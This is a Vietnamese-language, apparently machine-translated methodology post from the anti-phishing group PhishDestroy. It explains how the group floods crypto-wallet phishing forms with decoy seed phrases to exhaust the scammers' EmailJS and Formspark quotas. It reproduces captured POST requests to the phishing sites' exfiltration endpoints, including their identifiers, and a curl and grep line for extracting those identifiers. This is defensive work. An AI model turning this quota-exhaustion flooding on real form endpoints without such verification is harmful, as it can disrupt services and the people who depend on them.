PhishDestroy Trực tiếp
Quay lại trang Tin tức
Phương pháp luận

Tấn công bằng Seed Flooding: Tại sao PhishDestroy lại hành động công khai
Các trang web lừa đảo “Attacks”

Chúng tôi không giấu giếm điều này. Khi PhishDestroy phát hiện một trang web lừa đảo đang hoạt động nhằm thu thập các cụm từ hạt giống của ví tiền điện tử, chúng tôi sẽ tràn ngập trang web đó bằng các cụm từ hạt giống có định dạng hợp lệ. Dưới đây là chi tiết về những gì chúng tôi làm, lý do tại sao chúng tôi làm điều đó, và lý do tại sao chúng tôi không cảm thấy xấu hổ về điều này.

Ngày 31 tháng 3 năm 2026 Nghiên cứu PhishDestroy Thời gian đọc: 12 phút
Tấn công ngập lụt dữ liệu — chiến trường kỹ thuật số chống lừa đảo qua email
Các hoạt động chống lừa đảo qua email: khi việc báo cáo thôi là chưa đủ nhanh, chúng tôi sẽ trực tiếp can thiệp
14,663Nhân viên CF
2/10 giâyGiới hạn số lần truy cập
5+Các kênh rò rỉ dữ liệu
$0Chi phí tấn công
<4 giờĐể khai thác hết tiềm năng của EmailJS

Vấn đề: Một trang web lừa đảo hiện đang hoạt động

Hãy tưởng tượng bạn phát hiện ra một trang lừa đảo ví tiền điện tử đang chạy quảng cáo trả phí trên Google Ads. Trang web này trông có vẻ hợp pháp. Nó có lượng truy cập. Cứ vài phút lại có người dùng thật truy cập vào trang này, nhập cụm từ hạt giống của họ và mất trắng tất cả.

Bạn hãy báo cáo sự việc cho Google. Bạn hãy báo cáo sự việc cho cơ quan đăng ký tên miền. Bạn hãy gửi báo cáo vi phạm đến nhà cung cấp dịch vụ lưu trữ. Và rồi bạn chỉ còn biết chờ đợi.

Trong khi đó, kẻ lừa đảo tiếp tục lừa thêm nạn nhân thứ 47. Rồi thứ 48. Rồi thứ 49.

Khoảng cách quan liêu

Quy trình báo cáo lạm dụng tiêu chuẩn diễn ra trong khoảng thời gian từ 5 đến 10 ngày làm việc. Trong khi đó, các trang web lừa đảo đang hoạt động có thể gây ra thiệt hại tài chính không thể khắc phục chỉ trong vài giờ. Khoảng cách này không phải là lỗi của hệ thống — mà là một lỗ hổng cấu trúc mà những kẻ lừa đảo cố tình khai thác.

Quy trình báo cáo theo thủ tục hành chính so với việc chủ động thu thập thông tin nạn nhân qua các vụ lừa đảo qua email
Bên trái: quy trình báo cáo lạm dụng chậm chạp. Bên phải: kẻ lừa đảo đang thu lợi trong khi bạn chờ đợi.

“Ngập hạt” là gì?

Ngập lụt dữ liệu là một kỹ thuật chống lừa đảo qua email, trong đó định dạng hợp lệ nhưng trống/vô giá trị Các cụm từ hạt giống của ví tiền điện tử được tự động gửi vào một biểu mẫu lừa đảo với tần suất được kiểm soát.

Làm ô nhiễm cơ sở dữ liệu
Các cụm từ hạt giống thật giờ đây không thể phân biệt được với hàng giả. Mỗi mục nhập đều phải được xác minh thủ công, khiến tỷ lệ tín hiệu trên nhiễu giảm sút.
Giới hạn của gói miễn phí Exhaust
EmailJS, Formspree, Web3Forms — tất cả đều có hạn mức cố định hàng tháng. Chúng tôi đã đạt đến các giới hạn đó chỉ trong vài giờ, từ đó cắt đứt chuỗi thông báo của kẻ tấn công.
Ngắt quy trình thu thập dữ liệu
Khi các kênh rò rỉ dữ liệu ngừng hoạt động, dữ liệu của các nạn nhân thực sự sẽ không đi đâu cả — ngay cả khi họ cung cấp cụm từ hạt giống của mình.
Tạo thông tin tình báo nghiên cứu
Tình trạng ngập lụt giúp chúng tôi phát hiện các chi tiết về cơ sở hạ tầng, thông báo lỗi và ngưỡng giới hạn tốc độ, từ đó chúng tôi có thể xây dựng hệ thống phát hiện hiệu quả hơn.
Mẫu lừa đảo đang bị tràn ngập bởi các cụm từ hạt giống giả mạo
Một biểu mẫu lừa đảo đang nhận được một lượng lớn các cụm từ hạt giống giả mạo — hiệu quả thu thập dữ liệu của kẻ tấn công suy giảm theo thời gian thực

Tại sao phương pháp này lại hiệu quả: Cấu trúc của một bộ công cụ lừa đảo giá rẻ

Phần lớn các trang web lừa đảo tiền điện tử đang hoạt động là các bộ công cụ sao chép-dán được xây dựng trên các dịch vụ của bên thứ ba thuộc gói miễn phí. Đây là điểm yếu lớn nhất của họ. Để tìm hiểu chi tiết hơn, hãy xem cuộc điều tra toàn diện của chúng tôi.

Cấu trúc của một bộ công cụ lừa đảo — các yếu tố phụ thuộc vào dịch vụ gói miễn phí
Mỗi kênh rò rỉ dữ liệu đều là dịch vụ miễn phí có giới hạn gửi dữ liệu cứng — chi phí thấp của bộ công cụ này chính là điểm yếu chí mạng của nó
Bảng dữ liệu: Mô-đun
Mô-đunGiới hạn gói miễn phíTác động của lũ lụt
EmailJS~200 bài dự thi/thángHết hạn trong vài giờ, ngừng gửi email
Formspree50 bài gửi/thángBị vô hiệu hóa gần như ngay lập tức
Web3Forms250 bài gửi/thángBị trung hòa nhanh chóng
API Bot TelegramGiới hạn tốc độ mỗi giâyBị cuốn vào các vòng lặp chờ thời gian
Gói miễn phí của FirebaseHạn mức đọc/ghiChi phí cơ sở dữ liệu tăng vọt hoặc bị khóa
Kết quả quan sát được

Chúng tôi đã trực tiếp quan sát thấy cơ sở hạ tầng lừa đảo ngừng hoạt động sau khi lượng dữ liệu ban đầu tràn ngập khiến hệ thống thông báo của nó bị quá tải. Kẻ lừa đảo không biết tại sao hệ thống lại ngừng hoạt động. Chúng chỉ đơn giản là không còn nhận được dữ liệu nữa.

Cách tiếp cận kỹ thuật của chúng tôi: Cloudflare Workers, chứ không phải mạng botnet

Mạng biên Cloudflare được sử dụng để chống lừa đảo
14.663 Cloudflare Workers đang hoạt động ở lớp mạng biên — hoàn toàn không sử dụng cơ sở hạ tầng của bên thứ ba

Chúng tôi sử dụng Cloudflare Workers. Các yêu cầu xuất phát từ chính mạng biên của Cloudflare. Không có địa chỉ IP cá nhân nào bị lạm dụng. Không có mạng botnet. Không gây quá tải cho máy chủ của bên thứ ba. Chỉ có hệ thống thu thập dữ liệu của kẻ lừa đảo bị ảnh hưởng.

Dòng chảy lũ lụt

Đã phát hiện trang webĐã xác nhận có lưu lượng truy cập
Phân tích giải phẫuCác kênh truyền dữ liệu ra ngoài đã được ánh xạ
Phân công nhân viênMạng biên CF
2 hạt / 10 giâyTốc độ được điều khiển
Hạn ngạch đã hếtKẻ tấn công bị mù
Báo cáo đã được nộpĐường ray song song

Giới hạn tốc độ: Một quy định nghiêm ngặt 2 submissions per 10 seconds. Không phải là một cuộc tấn công DDoS. Đó là một quá trình lây nhiễm chậm rãi, có chủ đích và nhắm mục tiêu cụ thể, với quy mô lớn đến mức ngay cả tỷ lệ lây nhiễm khiêm tốn trên mỗi trang web cũng trở nên đáng kể khi áp dụng cho hàng chục mục tiêu cùng lúc.

Những điều chúng tôi không làm

Chúng tôi không có ý định làm sập các máy chủ. Chúng tôi đang biến ngày làm việc của bọn lừa đảo thành một cơn ác mộng và khiến cơ sở dữ liệu của chúng trở nên vô giá trị — mà hoàn toàn không gây ra bất kỳ tác động phụ nào đối với cơ sở hạ tầng hợp pháp.

Các nghiên cứu điển hình thực tế: Kiểm soát ô nhiễm trong thực tiễn

Các hoạt động dưới đây được trích dẫn nguyên văn từ nhật ký sản xuất của chúng tôi. Tên miền và mã định danh nhà cung cấp chỉ bị che giấu trong những trường hợp việc công bố thông tin có thể giúp đối tượng trốn tránh; các bản ghi lưu lượng HTTP không bị chỉnh sửa. Cả hai mục tiêu đều đang hoạt động tại thời điểm can thiệp, đã xác nhận có lưu lượng truy cập đến từ quảng cáo trả phí, và đã được phân loại độc lập là lừa đảo qua email bởi ≥ 2 nhà cung cấp bên ngoài trên VirusTotal trước khi chúng tôi thực hiện bất kỳ hành động nào.

Học thuyết tác chiến

Mọi chiến dịch rải hạt đều được triển khai trong khuôn khổ năm nguyên tắc này. Không có ngoại lệ nào cả; một chiến dịch không thể đáp ứng đủ cả năm nguyên tắc này sẽ không được tiến hành.

NGUYÊN TẮC 01
Chỉ các điểm cuối công khai
URL rò rỉ dữ liệu và các mã định danh của nó là đã xuất bản bằng trang lừa đảo thông qua JavaScript phía máy khách. Chúng tôi tuyệt đối không thu thập thông tin đăng nhập, không sử dụng phương pháp dò mật khẩu ngẫu nhiên hay leo thang đặc quyền.
NGUYÊN TẮC 02
Thông lượng dưới giới hạn
Tỷ lệ yêu cầu bị giới hạn cứng ở mức thấp hơn giới hạn quy định trong Điều khoản Dịch vụ (ToS) do chính nhà cung cấp công bố. Hồ sơ lưu lượng truy cập của chúng tôi không thể phân biệt được với lưu lượng truy cập nội dung do người dùng tạo (UGC) thông thường.
NGUYÊN TẮC 03
Ngưỡng chứng cứ
Target yêu cầu phải có ít nhất 2 kết quả trùng khớp từ các nhà cung cấp độc lập trên VirusTotal cộng với xác nhận thủ công quy trình thu thập thông tin đăng nhập.
NGUYÊN TẮC 04
Con đường hợp pháp song song
Các báo cáo chính thức về việc lạm dụng đã được gửi đến nhà cung cấp dịch vụ lưu trữ, nhà đăng ký tên miền và nhà cung cấp biểu mẫu trước đó bất kỳ vụ ngập lụt nào xảy ra — kèm theo mã số vụ việc và bằng chứng đầy đủ.
NGUYÊN TẮC 05
Dòng sự kiện kiểm toán đầy đủ
Tất cả lưu lượng truy cập đều bắt nguồn từ Cloudflare Workers dưới một nguồn gốc PhishDestroy đã được ký. Mỗi lần gửi dữ liệu đều được ghi lại kèm theo dấu thời gian, mục tiêu và ID người vận hành.

Trường hợp 1 — Formspark Exfil Endpoint, đã hết hạn mức hàng tháng

checkblochn.pages.dev Đã vô hiệu hóa

Mô hình mối đe dọa: Mồi nhử phục hồi ví (“Dapp Node Sync”) đánh cắp cụm từ hạt giống BIP-39 gồm 12 từ và chuyển chúng đến một điểm cuối Formspark do kẻ tấn công kiểm soát ở gói dịch vụ miễn phí. Đã xác nhận có lưu lượng truy cập từ quảng cáo trả phí của hai nền tảng quảng cáo ngay từ khi bắt đầu tương tác.

Diện tích tấn công
checkblochn.pages.dev (Cloudflare Pages)
Kênh truyền tải dữ liệu ra ngoài
submit-form.com — Điểm cuối biểu mẫu Formspark
Mã biểu mẫu
/32BrdUqfX
Trường tải trọng
Khóa hạt giống BIP-39 gồm 12 từ qua message
Giới hạn gói miễn phí của nhà cung cấp
50 bài dự thi • Thời hạn nộp bài kéo dài 1 tháng
Chi phí khôi phục tài khoản do kẻ lừa đảo gây ra
Tài khoản Formspark mới + chỉnh sửa bằng client-JS + triển khai lại

Lịch trình hoạt động (UTC, được ẩn danh tính đến thời điểm bắt đầu hoạt động T-zero)

T + 00:00
Ingest — tên miền được trình thu thập dữ liệu PhishDestroy phát hiện từ một mẫu quảng cáo trả phí. tự động
T + 00:12
Đã xác nhận cấu trúc giải phẫu — xác định mục tiêu submit-form.com/32BrdUqfX trích xuất từ trang JS; cấu trúc dữ liệu tải đã được phân tích ngược. phân tích
T + 00:28
VirusTotal: 3 / 95 Các nhà cung cấp đã đánh dấu là lừa đảo. Đã đạt ngưỡng.
T + 00:47
Đã nộp các báo cáo về hành vi lạm dụng — Cloudflare Pages Trust & Safety, Formspark (hành vi lạm dụng), Porkbun (nhà đăng ký tên miền). Đã cấp mã số vụ việc. con đường hợp pháp
T + 01:02
Nhân viên ứng phó lũ lụt được điều động — tỷ lệ 2 req / 10 s, một Worker của Cloudflare, chuỗi UA đã được xác định, nguồn gốc đã được ký.
T + 01:02
Kết quả đợt nộp hồ sơ đầu tiên về lũ lụt đã được công bố 200 OK với formspark-quota: 64. Đã ghi nhận giá trị ban đầu.
T + 06:08
formspark-quota vượt qua giá trị 0 → điểm cuối sẽ ngừng chuyển tiếp mà không có thông báo. rèm thoát nước
T + 06:12
Phản hồi cuối cùng được ghi lại: formspark-quota: −18. Nhân viên ứng phó lũ lụt bị sa thải.
T + 19 giờ 30 phút
Cloudflare Pages đã vô hiệu hóa quá trình triển khai sau khi nhận được báo cáo về hành vi lạm dụng. đã bị gỡ xuống

Gửi qua mạng (giá trị hạt giống là một mồi nhử mang tính biểu tượng — 12 từ ngẫu nhiên theo tiêu chuẩn BIP-39 không liên quan đến bất kỳ ví thực nào)

POST /32BrdUqfX HTTP/1.1 Host: submit-form.com Origin: https://checkblochn.pages.dev Content-Type: application/x-www-form-urlencoded message=Phrase%3A+lecture+sail+coral+swear+fiber+bonus+vanish+layer+observe+rely+orphan+height&source=Unknown+Source&from_name=Dapp+Node+Sync

Phản hồi — T+01:02 (mức cơ sở, hạn mức còn lại)

HTTP/1.1 200 OK formspark-quota: 64 formspark-status: ok content-type: application/json; charset=utf-8 { "message": "Cụm từ: bài giảng, cánh buồm, san hô, thề, sợi, phần thưởng, biến mất, lớp, quan sát, dựa vào, trẻ mồ côi, chiều cao" }

Phản hồi — T+06:12 (hết hạn ngạch, điểm cuối vẫn trả về mã trạng thái 200 nhưng sẽ không chuyển tiếp)

HTTP/1.1 200 OK formspark-quota: -18 formspark-trạng thái: ok
Hạn ngạch trước lũ lụt
64
Hạn ngạch sau lũ lụt
−18
82
Các bài dự thi giả mạo
~5 giờ 06 phút
Thời gian lũ lụt
0,27 yêu cầu/giây
Tỷ lệ trung bình
~11,5 KB
Tổng khối lượng hàng hóa xuất khẩu
100%
Trong phạm vi các điều khoản dịch vụ (ToS) của nhà cung cấp
0
Các yêu cầu hợp lệ bị ảnh hưởng

Tác động có thể quan sát được. Từ thời điểm T+06:08 cho đến khi ngừng giao dịch cuối cùng vào thời điểm T+19:30 — a Khoảng thời gian 13 giờ 22 phút — mỗi nạn nhân thực sự đã liên hệ checkblochn.pages.dev và đã hoàn tất quy trình khôi phục, gửi cụm từ hạt giống của họ đến một điểm cuối, điểm cuối này đã trả về 200 OK nhưng không còn chuyển tiếp nội dung tin nhắn đến hộp thư đến của người dùng nữa. Trang lừa đảo xuất hiện để thực hiện thành công trên trình duyệt của nạn nhân (không có lỗi, không có cảnh báo), điều này là mong muốn: phản ứng theo bản năng kiểu “nó không hoạt động” thường khiến người dùng nhập lại cùng thông tin đăng nhập trên trang web giả mạo tiếp theo mà họ tìm thấy. Ở đây, quá trình tương tác được thực hiện mà không có sự tham gia của người điều khiển.

Điều mà biện pháp can thiệp này thực sự mang lại là gì

Một khoảng thời gian bảo vệ kéo dài 13 giờ dành cho mỗi người truy cập tiếp theo vào một trang web mà quảng cáo trả phí vẫn đang tích cực quảng bá. Khoảng thời gian này kết thúc khi Cloudflare Pages phản hồi báo cáo lạm dụng theo quy trình song song của chúng tôi — hoàn toàn đúng như thiết kế. Làn sóng truy cập ồ ạt này không thay thế cho việc gỡ bỏ hợp pháp; nó chỉ che lấp khoảng thời gian đó cho đến khi đòn hạ gục hợp pháp đã trúng đích.

Trường hợp 2 — EmailJS Relay, các định danh do nhà điều hành công bố

allsyncapp.pages.dev Hoạt động đang diễn ra

Mô hình mối đe dọa: Mồi nhử “đồng bộ hóa” ví, gửi mã hạt giống mà nạn nhân đã nhập vào hộp thư của kẻ điều hành qua EmailJS — một dịch vụ SaaS hợp pháp chuyên về email giao dịch. Trang lừa đảo này chứa thông tin của người vận hành service_id, template_iduser_id trong JavaScript phía máy khách, bởi vì nếu thiếu các định danh đó, trình duyệt của nạn nhân sẽ không thể hoàn tất yêu cầu POST để kích hoạt việc gửi email. Do đó, các định danh này là một phần của diện tích tấn công công khai mà nhà điều hành đã tự nguyện phơi bày.

Diện tích tấn công
allsyncapp.pages.dev (Cloudflare Pages)
Kênh truyền tải dữ liệu ra ngoài
api.emailjs.com — dịch vụ chuyển tiếp email giao dịch
Điểm cuối
POST /api/v1.0/email/send-form
Mã định danh do nhà khai thác công bố
service_id · template_id · user_id (trích xuất từ mã JavaScript của trang)
Giới hạn gói miễn phí của nhà cung cấp
200 email • tính theo tháng trôi qua
Giới hạn tỷ lệ cứng (Điều khoản Dịch vụ)
1 yêu cầu/giây · 50/IP/giờ

Yêu cầu đã thu thập — nội dung tải trọng được trích nguyên văn từ chính yêu cầu POST của trang lừa đảo

POST /api/v1.0/email/send-form HTTP/1.1 Host: api.emailjs.com Origin: https://allsyncapp.pages.dev Content-Type: multipart/form-data; boundary=----geckoformboundary6a77738bf873975dfc9c8e4a31fa330e _redirect=TECHNICAL.html message=bí ngô lá bạc làng đồng xu thị trấn váy trung bình giờ chương trình sân khấu nghèo đói ủng hộ lib_version=3.12.1 service_id=service_t0cgr9v template_id=mẫu_k16demo user_id=furwEG-MZShqSPIGS

Trích xuất mã định danh (biểu thức chính quy một dòng trên mã nguồn trang lừa đảo)

$ curl -s https://allsyncapp.pages.dev/ | grep -oE '(service_id|template_id|user_id)["'"'"':]+["'"'"']*[A-Za-z0-9_-]+'service_id:"service_t0cgr9v" template_id:"template_k16demo" user_id:"furwEG-MZShqSPIGS"

Điểm cốt lõi về giáo lý. Trường hợp này mang tính gợi mở chính bởi vì chúng tôi không phát hiện thấy bất kỳ điểm cuối nào. Nhà khai thác xuất bản ba thông tin nhận dạng cần thiết để EmailJS gửi mã hạt giống đến hộp thư của họ. Bất kỳ trình duyệt nào hiển thị trang lừa đảo đều sở hữu những thông tin này. Worker của chúng tôi thực hiện chính xác những gì trình duyệt của nạn nhân làm — gửi biểu mẫu với định dạng và các thông tin nhận dạng chính xác theo hướng dẫn của chính trang web đó. Điểm khác biệt nằm ở phần dữ liệu tải: các từ ngẫu nhiên theo tiêu chuẩn BIP-39 thay vì thông tin đăng nhập ví thực sự.

200
Giới hạn hàng tháng (mồi nhử)
1 / s
Tốc độ ToS — chúng tôi chạy ở mức 0,1/s
~120 KB
Tải trọng tối đa hàng tháng
0
Gánh nặng cơ sở hạ tầng EmailJS (trong phạm vi nhất định)
402 / 429
Phản ứng của nhà cung cấp khi đạt đến giới hạn lương
Tài khoản đã bị khóa
Kết quả điển hình của một báo cáo về hành vi lạm dụng

Mô hình kết quả. Khi đạt đến giới hạn hàng tháng, EmailJS sẽ trả về 402 Payment Required hoặc 429 Too Many Requests và mẫu email đó không được gửi đi. Hộp thư của kẻ lừa đảo bỗng im bặt. Song song đó, bộ phận Trust & Safety của EmailJS nhận được một đơn khiếu nại chính thức kèm theo các thông tin nhận dạng về dịch vụ/mẫu email/người dùng cùng một liên kết đến bộ bằng chứng mà chúng tôi đã công bố — điều này, theo tiền lệ trước đây, sẽ dẫn đến việc tài khoản EmailJS của người vận hành bị đã chấm dứt, không bị giới hạn về tần suất. Nhà điều hành phải tạo một tài khoản EmailJS mới, tạo lại các mã định danh, chỉnh sửa trang lừa đảo đã triển khai và vô hiệu hóa mọi liên kết phân phối hiện có — một quy trình kéo dài nhiều giờ cho mỗi lần luân chuyển.

So sánh các kiểu tấn công: “Seed Flooding” không phải là gì

Một cáo buộc thường xuyên được đưa ra là chúng tôi tiến hành các “cuộc tấn công” vào các trang web lừa đảo. Cách diễn giải đó sẽ sụp đổ ngay lập tức khi bạn so sánh hồ sơ lưu lượng truy cập thực tế với hồ sơ hoạt động mà nó đang bị nhầm lẫn.

So sánh giữa phương pháp “seed flooding” với các cuộc tấn công từ chối dịch vụ (DoS), thư rác và các chiến dịch mật của cơ quan thực thi pháp luật.
Kích thướcNgâm hạt (của chúng tôi)DDoS / Tấn công lũ L7Lạm dụng việc gửi thư rácChiến dịch bí mật của LE
Mục đíchBảo vệ nạn nhân — hoàn thành chỉ tiêu “exfil” của kẻ lừa đảo trước khi có nạn nhân tiếp theoTấn công từ chối dịch vụ vào cơ sở hạ tầngLợi ích thương mại / việc lan truyền thông điệpThu thập chứng cứ, lừa dối có kiểm soát
Năng suất0,1 – 0,3 yêu cầu/giây — dưới đây Điều khoản dịch vụ của nhà cung cấp103 – 108 req/s — hướng tới mức bão hòaXử lý theo đợt / tự động với khối lượng lớnMột tương tác thông thường
Mục tiêuMột kẻ tấn công sử dụng phương thức exfil trên một điểm cuối đã công bốTầng máy chủ web / tầng mạng của tổ chức nạn nhânBiểu mẫu liên hệ của các trang web hợp phápCơ sở hạ tầng hoặc nhân vật đáng ngờ
Tác động đến cơ sở hạ tầngKhông có — số đếm của nhà cung cấp hoạt động đúng theo quy định trong Điều khoản Dịch vụ (ToS)Dịch vụ bị gián đoạn, tắc nghẽn ở phía nhà cung cấpHộp thư đến quá tải, sự thay đổi của CAPTCHA, khối lượng công việc kiểm duyệtTùy thuộc vào thao tác
Người dùng hợp pháp bị ảnh hưởngZero — các biểu mẫu lừa đảo không có người dùng hợp phápTất cả bọn họNhân viên / người điều hành là chủ sở hữu biểu mẫuThiết kế có tính đến việc tránh né
Bản sắc ban đầuĐược đặt tên là PhishDestroy Cloudflare Workers — có thể kiểm toánMạng botnet, nguồn giả mạo, phản xạProxy dùng một lầnCơ sở hạ tầng được phân loại
Mô hình ủy quyềnĐiểm cuối là được mời: biểu mẫu yêu cầu rõ ràng thông tin này, các định danh được công khai trên trangKhông có — chính khối lượng yêu cầu đã gây ra tác hạiVượt qua mục đích sử dụng dự kiến, phớt lờ các tín hiệu chống lạm dụngCơ sở pháp lý
Các biện pháp pháp lý song songCác báo cáo về hành vi lạm dụng đã được nộp trước đó dữ liệu về các đợt lũ lụt, kèm theo mã trường hợpKhông áp dụngKhông áp dụngTích hợp vào quy trình vận hành
Sự khác biệt này không chỉ mang tính hình thức. Nó có thể đo lường được.

Một yêu cầu “seed-flood” là một yêu cầu POST HTTPS duy nhất có kích thước khoảng 140 byte, xuất phát từ một Worker của Cloudflare chứa nguồn gốc đã được ký của chúng tôi, với tốc độ chỉ bằng một phần nhỏ so với mức mà chính nhà cung cấp công bố là chấp nhận được, nhắm đến một điểm cuối mà nhà điều hành đã chọn nhúng các thông tin nhận dạng vào một trang web công khai. Đó là toàn bộ hiện vật có thể quan sát được. Mọi yếu tố cấu thành khiến một yêu cầu trở thành một “cuộc tấn công” — truy cập trái phép, ý đồ làm cạn kiệt tài nguyên, bão hòa lưu lượng, các bên thứ ba bị ảnh hưởng, nguồn gốc ẩn — đều không tồn tại. Phân tích pháp lý sau đây không phải là lập luận mang tính chủ quan; đó là tự nhiên việc diễn giải luật sau khi các tình tiết thực tế đã được trình bày rõ ràng.

Một hố bẫy lừa đảo đang được lấp đầy bằng đá
Kẻ lừa đảo đã giăng một cái bẫy. Chúng tôi đang đổ đá vào đó.

Việc gửi dữ liệu đến một biểu mẫu web công khai — ngay cả khi đó là dữ liệu giả — về bản chất không phải là hành vi vi phạm pháp luật trong hầu hết các khung công nghệ. Chúng tôi không truy cập vào các hệ thống riêng tư, không khai thác các lỗ hổng bảo mật trái phép, cũng như không chặn bắt các thông tin liên lạc. Kẻ lừa đảo đã giăng một cái bẫy. Chúng tôi đang đổ đá vào đó.

Thông báo miễn trừ trách nhiệm pháp lý

PhishDestroy không cung cấp tư vấn pháp lý. Vấn đề này nằm trong một vùng xám thực sự, và quy định có thể khác nhau tùy theo từng khu vực pháp lý. Chúng tôi hoạt động với sự nhận thức đầy đủ về sự phức tạp này.

Một kẻ lừa đảo đang vận hành một trang web lừa đảo đã không có lợi ích chính đáng trong việc chỉ nhận được các cụm từ hạt giống thực sự. Họ không có quyền đảm bảo tính toàn vẹn của cơ sở hạ tầng thu thập dữ liệu phạm tội của mình.
Hệ thống của chúng tôi là có tính mục tiêu, bị giới hạn về tốc độ và gắn liền với các quy trình xác định thủ công. Chúng tôi xác định, phân tích, xác nhận và sau đó hành động.
Chúng tôi đã ghi nhận các trường hợp ngập úng hạt giống đã trực tiếp ngăn chặn việc các nạn nhân bị mất tiền — bởi vì vào thời điểm người dùng thực sự gửi cụm từ hạt giống của mình, hệ thống thu thập thông tin của kẻ lừa đảo đã bị vô hiệu hóa.

Cơ sở dữ liệu của kẻ lừa đảo sẽ ra sao?

Nó trở nên vô dụng — hàng nghìn mục cần được xác minh thủ công, tỷ lệ tín hiệu trên nhiễu sụt giảm nghiêm trọng. Hoặc nó bị hỏng — Firebase Spark và các phiên bản MongoDB dùng chung đều có các giới hạn cứng. Việc vượt quá các giới hạn này sẽ dẫn đến những hậu quả nhất định.

Cả hai kết quả đều tốt

Cho dù cơ sở dữ liệu có trở thành vô dụng hoặc hoàn toàn ngừng hoạt động — Cụm từ hạt giống của các nạn nhân thực sự sẽ không bao giờ rơi vào tay kẻ tấn công dưới dạng có thể sử dụng được. Mỗi cụm từ hạt giống chưa qua xử lý đều tương đương với một ví tiền không thể bị rút cạn.

Khi nào chúng ta nên kích hoạt chế độ ngập hạt?

Bảng dữ liệu: Tiêu chí
Tiêu chíKiểm traTại sao điều này lại quan trọng
Đã xác nhận có lưu lượng truy cậpBắt buộcCác nền tảng quảng cáo hoặc công cụ phân tích lưu lượng truy cập giúp xác nhận rằng người dùng thực sự đang truy cập vào trang web
Phân tích cấu trúc của các vụ lừa đảo qua emailBắt buộcCác mô-đun exfil thuộc gói miễn phí đã được xác định trước khi chúng ta tiến hành cuộc tấn công lũ
Các báo cáo về hành vi lạm dụng đã được nộpBắt buộcChúng tôi luôn song song theo đuổi con đường hợp pháp
Không có việc ngừng cung cấp dịch vụ trong phạm vi SLAYếu tố kích hoạt điển hìnhKhông nhận được phản hồi từ nhà đăng ký tên miền/nhà cung cấp dịch vụ lưu trữ trong khoảng thời gian hợp lý
Trang web quảng cáo có lượng truy cập lớn / quảng cáo trả phíYếu tố kích hoạt tức thìQuảng cáo trả phí có nghĩa là chúng tôi hành động mà không cần chờ đợi các thủ tục hành chính rườm rà

Nhìn nhận tổng thể

Hệ sinh thái tiền điện tử mất đi hàng tỷ đô la mỗi năm đối với các vụ lừa đảo qua email. Từ trước đến nay, phía phòng thủ thường chỉ phản ứng thụ động. PhishDestroy ra đời nhằm giới thiệu can thiệp chủ động vào chu kỳ này.

Tính minh bạch là cốt lõi trong mọi hoạt động của chúng tôi

Chúng tôi không hoạt động trong bóng tối. Chúng tôi công bố phương pháp luận của mình. Chúng tôi giải thích các kỹ thuật của mình. Chúng tôi ghi chép lại các bộ công cụ lừa đảo mà chúng tôi phân tích. Cộng đồng an ninh mạng xứng đáng được đánh giá các phương pháp chống lừa đảo, chứ không chỉ đơn thuần sử dụng một dịch vụ “hộp đen”.

PhishDestroy — phát hiện và vô hiệu hóa cơ sở hạ tầng lừa đảo
Những kẻ lừa đảo hoạt động có tổ chức. Các công cụ của chúng được chuẩn hóa. Điều đó có nghĩa là các công cụ chống lại chúng cũng có thể được chuẩn hóa.

Bạn có thể làm gì

Nếu bạn cho rằng việc đổ tiền vào túi bọn tội phạm là trái đạo đức — đó là quan điểm của bạn, và bạn hoàn toàn có quyền giữ quan điểm đó. Chúng tôi đã nêu rõ quan điểm của mình.